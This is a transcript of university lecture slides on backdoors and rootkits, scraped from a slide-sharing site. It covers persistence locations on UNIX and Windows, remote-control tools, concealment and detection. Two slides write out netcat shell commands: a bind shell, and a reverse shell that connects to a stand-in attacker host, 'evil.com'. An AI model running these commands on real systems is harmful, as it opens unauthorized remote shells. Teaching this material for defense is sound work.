CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Backdoors and Rootkits.

Slides:



Advertisements
Similar presentations
Password Cracking, Network Sniffing, Man-in-the-Middle attacks, and Virtual Private Networks Lab 2 – Class Discussion Group 3 Ruhull Alam Bhuiyan Keon.
Advertisements

Backdoors, Trojans and Rootkits CIS 413 This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited.
Backdoors A backdoor is a program that allows attackers to bypass normal security controls on a system, gaining access on the attacker’s own terms.
WARNING ! The system is either busy or has been unstable. You can wait and See if it becomes available again, or you can restart your computer. *
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 5 Port Scanning.
Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Scanning.
Suneeta Chawla Web Security Presentation Topic : IP Spoofing Date : 03/24/04.
Week 6-1 Week 6: Trojans and Backdoors What is a Trojan Horse? Overt and Covert.
Web Defacement Anh Nguyen May 6 th, Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Web Server Administration TEC 236 Securing the Web Environment.
Vijay krishnan Avinesh Dupat  Collection of tools (programs) that enable administrator-level access to a computer or computer network.  The main purpose.
Maintaining Access Maintaining Access 1.
Computer Security and Penetration Testing
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Netcat.
Information Networking Security and Assurance Lab National Chung Cheng University Backdoors and Remote Access Tools INSA Laboratory.
DDos Distributed Denial of Service Attacks by Mark Schuchter.
Chapter 12: Anatomy of an Attack
COEN 252: Computer Forensics Router Investigation.
 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.
The Five Most Popular Attacks on the Internet Peter Mell, National Institute of Standards and Technology Computer Security Division.
1 Enabling Secure Internet Access with ISA Server.
Chapter 11 Phase 5: Covering Tracks and Hiding. Attrition Web Site  Contains an archive of Web vandalism attacks
Trojan Horse Implementation and Prevention By Pallavi Dharmadhikari Sirisha Bollineni VijayaLakshmi Jothiram Vasanthi Madala.
1 Backdoors and Trojans. ECE Internetwork Security 2 Agenda Overview Netcat Trojans/Backdoors.
OSI Model Routing Connection-oriented/Connectionless Network Services.
CS426Fall 2010/Lecture 361 Computer Security CS 426 Lecture 36 Perimeter Defense and Firewalls.
Network Address Translation (NAT) CS-480b Dick Steflik.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Basic Security Networking for Home and Small Businesses – Chapter 8.
Using Windows Firewall and Windows Defender
Network Security Introduction Some of these slides have been modified from slides of Michael I. Shamos COPYRIGHT © 2003 MICHAEL I. SHAMOS.
Vijay Krishnan Avinesh Dupat. A rootkit is software that enables continued privileged access to a computer while actively hiding its presence from administrators.
ECE4112 Lab 7: Honeypots and Network Monitoring and Forensics Group 13 + Group 14 Allen Brewer Jiayue (Simon) Chen Daniel Chu Chinmay Patel.
Live Forensics Investigations Computer Forensics 2013.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Backdoors and Rootkits.
COEN 350 Security Threats. Network Based Exploits Phases of an Attack  Reconnaissance  Scanning  Gaining Access  Expanding Access  Covering Tracks.
Chapter 8 Safeguarding the Internet. Firewalls Firewalls: hardware & software that are built using routers, servers and other software A point between.
FORESEC Academy FORESEC Academy Security Essentials (III)
CHAPTER 10 Session Hijacking. INTRODUCTION The act of taking over a connection of some sort, for examples, network connection, a modem connection or other.
1 CHAPTER 3 CLASSES OF ATTACK. 2 Denial of Service (DoS) Takes place when availability to resource is intentionally blocked or degraded Takes place when.
Hacker’s Strategies Revealed WEST CHESTER UNIVERSITY Computer Science Department Yuchen Zhou March 22, 2002.
Linux Networking Security Sunil Manhapra & Ling Wang Project Report for CS691X July 15, 1998.
Linux Networking and Security
Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.
1 Figure 4-1: Targeted System Penetration (Break-In Attacks) Host Scanning  Ping often is blocked by firewalls  Send TCP SYN/ACK to generate RST segments.
CHAPTER 9 Sniffing.
CIS 450 – Network Security Chapter 4 - Spoofing. Definition - To fool. In networking, the term is used to describe a variety of ways in which hardware.
Chapter 8 Phase3: Gaining Access Using Network Attacks
Hacking Windows 9X/ME. Hacking framework Initial access physical access brute force trojans Privilege escalation Administrator, root privileges Consolidation.
FTP File Transfer Protocol Graeme Strachan. Agenda  An Overview  A Demonstration  An Activity.
Rootkits, Backdoors, and Trojans ECE 4112 – Lab 5 Summary – Spring 2006 Group 9 Greg Sheridan Terry Harvey Group 10 Matthew Bowman Laura Silaghi Michael.
COEN 250 Computer Forensics Unix System Life Response.
NetTech Solutions Protecting the Computer Lesson 10.
Introduction to Network Security. Acknowledgements.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Covert Channels.
SSH. 2 SSH – Secure Shell SSH is a cryptographic protocol – Implemented in software originally for remote login applications – One most popular software.
1 Botnets Group 28: Sean Caulfield and Fredrick Young ECE 4112 Internetwork Security Prof. Henry Owen.
Lecture 19 Page 1 CS 236 Online 6. Application Software Security Why it’s important: –Security flaws in applications are increasingly the attacker’s entry.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Backdoors and Trojans.
Networks Fall 2009.
CITA 352 Chapter 5 Port Scanning.
Backdoor Attacks.
Firewall – Survey Purpose of a Firewall Characteristic of a firewall
Remote Control and Advanced Techniques
Chapter 3. Basic Dynamic Analysis
A Distributed DoS in Action
Lab 7 - Topics Establishing SSH Connection Install SSH Configure SSH
6. Application Software Security
Presentation transcript:

CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Backdoors and Rootkits

CIT 380: Securing Computer SystemsSlide #2 Topics Backdoors –Backdoor Types. –Netcat Backdoors. –Reverse Telnet. –Concealing Backdoors. Rootkits –User-mode Rootkits –Kernel Rootkits –Detecting Rootkits –Recovery from a Rootkit

CIT 380: Securing Computer SystemsSlide #3 Types of Backdoors Local Privilege Escalation Remote Command Execution Remote Shell Access Remote GUI Control

CIT 380: Securing Computer SystemsSlide #4 Starting Backdoors on UNIX /etc/inittab Startup scripts –/etc/rc.d and /etc/init.d scripts –Add a new script. –Modify an existing script. inetd –Add a new service to /etc/inetd.conf User startup scripts –.bashrc,.login,.cshrc,.xinitrc,.xsession, etc. cron

CIT 380: Securing Computer SystemsSlide #5 Starting Backdoors on Windows Autostart Folders –C:\Documents and Settings\[user]\Start Menu\Programs\Startup Startup Scripts –C:\Windows\win.ini, System.ini, Wininit.ini, etc. Registry Keys –HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Many others. Task Scheduler

CIT 380: Securing Computer SystemsSlide #6 Finding Backdoor Scripts Manual Scan –Time-consuming and error prone. Automatic –UNIX: chkrootkit, Titan –Windows: Autorun from File Integrity Check –HIDS like Tripwire or Osiris

CIT 380: Securing Computer SystemsSlide #7 Netcat Backdoors # nc –l –p 2222 –e /bin/sh (server on victim) $ nc victim.org 2222 (client on attacker host) Netcat (client) stdout stdin Netcat (server) stdout stdin Network

CIT 380: Securing Computer SystemsSlide #8 Reverse Backdoors What if the firewall blocks port 2222? What if the firewall blocks all incoming connections to victim.org? Solution: –Run the listener on the attacker host (evil.com). nc –l –p 80 –Run the client with a shell on the victim host. nc evil.com 80 –e /bin/sh

Remote-Control Backdoors List of thousands –

Windows Control Tools Page 559 VNC – Dameware – Back Orifice 2000 – SubSeven -

Remote Control Backdoor Capabilities Table 10.3 – Page Pop-up dialogs to dupe the user to enter information Keystroke logger List detailed system information Gather passwords Change registry setting Remote shell access

BO2K Page 562 – Figure 10.3

Distribution as an attachment from an infected machine to everyone in the contact list. In a wrapper program such as a game, a greeting card, etc. s the attacker or notifies via IRC ActiveX sends code from a Web server to a browser where it is executed. ActiveX can do anything on a user machine that the user can do. Page 564 – Figure 10.4

CIT 380: Securing Computer SystemsSlide #14 Defenses against Backdoors Detection –Port scans, e.g., nmap Prevention –Firewall on local host. –Use proxying firewall instead of packet filter.

CIT 380: Securing Computer SystemsSlide #15 Concealing Backdoors Encryption –Pipe through encryption program. –Use cryptcat or socat. Backdoors without ports. –ICMP backdoors. Loki, ICMP tunnel. –Sniffing backdoors.

CIT 380: Securing Computer SystemsSlide #16 Non-promicuous Sniffers Cd00r listens for all traffic to victim host. –Waits for appropriate port knock sequence. –After port knock can Open TCP shell port Reverse telnet a shell to attacker host. Sniff commands off wire.

CIT 380: Securing Computer SystemsSlide #17 Promiscuous Sniffing Backdoors 1.Install sniffing backdoor on victim host. 2.Send backdoor commands to sucker host. 3.Backdoor sniffs packets. 4.Backdoor responds with packets forged to be from sucker host.

CIT 380: Securing Computer SystemsSlide #18 Promiscuous Sniffing Backdoors victim host sucker host attacker host firewall sniff Internet spoof

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.